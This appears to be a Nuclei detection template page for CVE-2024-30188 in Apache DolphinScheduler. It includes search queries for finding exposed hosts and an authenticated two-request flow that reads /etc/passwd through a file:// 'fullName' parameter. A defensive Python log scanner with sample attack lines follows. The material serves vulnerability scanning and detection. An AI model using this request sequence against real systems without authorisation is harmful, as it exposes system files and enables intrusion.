Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write
ID: CVE-2024-30188
Severity: high
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,dolphinscheduler,lfi,apache,authenticated
Description
File read and write vulnerability in Apache DolphinScheduler: authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.
YAML Source
id: CVE-2024-30188

info:
  name: Apache DolphinScheduler >= 3.1.0, < 3.2.2 Resource File Read And Write
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    File read and write vulnerability in Apache DolphinScheduler, authenticated users can illegally access additional resource files. This issue affects Apache DolphinScheduler from 3.1.0 before 3.2.2.
  reference:
    - https://github.com/advisories/GHSA-4vv4-crw4-8pcw
    - https://github.com/Mr-xn/Penetration_Testing_POC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30188
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cve-id: CVE-2024-30188
    epss-score: 0.00045
    epss-percentile: 0.16536
    cpe: cpe:2.3:a:apache:dolphinscheduler:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: apache
    product: dolphinscheduler
    shodan-query: http.title:"dolphinscheduler"
    fofa-query: title="dolphinscheduler"
    google-query: intitle:"dolphinscheduler"
  tags: cve,cve2024,dolphinscheduler,lfi,apache,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2)

http:
  - raw:
      - |-
        POST /dolphinscheduler/login HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded

        userName={{username}}&userPassword={{password}}&ssoLoginUrl=

    extractors:
      - type: json
        name: sessionId
        part: body
        json:
          - ".data.sessionId"
        internal: true

  - raw:
      - |
        GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd HTTP/1.1
        Host: {{Hostname}}
        sessionId: {{sessionId}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: regex
        part: content_type
        regex:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008067c20527b6809c2e85a1471332e7042099fdb4f7fe722e59173bac8e6d23fd022100c5be45434d5be17944b96a8e3f74f398a44feddc3f98d87df76ba0a86d3cf359:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-30188.yaml"
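
For the defensive side of the second request in the template, the following added example (not part of the original template or of Nuclei) scans web access logs for calls to `/dolphinscheduler/resources/download` whose `fullName` value resolves outside the resource storage root. `ALLOWED_BASE`, the function names and the sample log lines are assumptions constructed for illustration; set `ALLOWED_BASE` to your deployment's storage root.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_BASE = "/dolphinscheduler"  # assumption: this deployment's resource storage root
DOWNLOAD_PATH = "/dolphinscheduler/resources/download"  # endpoint used by the template
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed access-log lines (combined log format), not from a real system.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2024:10:01:02 +0000] "GET /dolphinscheduler/resources/download?fullName=file:///etc/passwd HTTP/1.1" 200 1843
10.0.0.5 - - [12/Aug/2024:10:01:09 +0000] "GET /dolphinscheduler/resources/download?fullName=%66ile%3A%2F%2F%2Fetc%2Fhosts HTTP/1.1" 200 212
10.0.0.8 - - [12/Aug/2024:10:02:30 +0000] "GET /dolphinscheduler/resources/download?fullName=file:/dolphinscheduler/default/resources/job.sh HTTP/1.1" 200 532
10.0.0.8 - - [12/Aug/2024:10:03:11 +0000] "GET /dolphinscheduler/projects/list HTTP/1.1" 200 90
"""

def resolve_full_name(value):
    """Drop any URI scheme/authority, then normalise the path against the base."""
    parts = urlsplit(value)
    path = parts.path if parts.scheme else value
    # Relative names are resolved under the base; absolute ones replace it.
    return posixpath.normpath(posixpath.join(ALLOWED_BASE, path))

def is_outside_base(resolved):
    """True when the normalised path is not the base or a descendant of it."""
    return resolved != ALLOWED_BASE and not resolved.startswith(ALLOWED_BASE + "/")

def suspicious_downloads(log_text):
    """Return (client, status, resolved_path) for downloads outside the base."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if url.path != DOWNLOAD_PATH:
            continue
        # parse_qs percent-decodes once, so encoded schemes are still caught.
        for value in parse_qs(url.query).get("fullName", []):
            resolved = resolve_full_name(value)
            if is_outside_base(resolved):
                hits.append((client, status, resolved))
    return hits

if __name__ == "__main__":
    for hit in suspicious_downloads(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 corresponds to the condition the template's matchers test for and is worth correlating with the session that issued it.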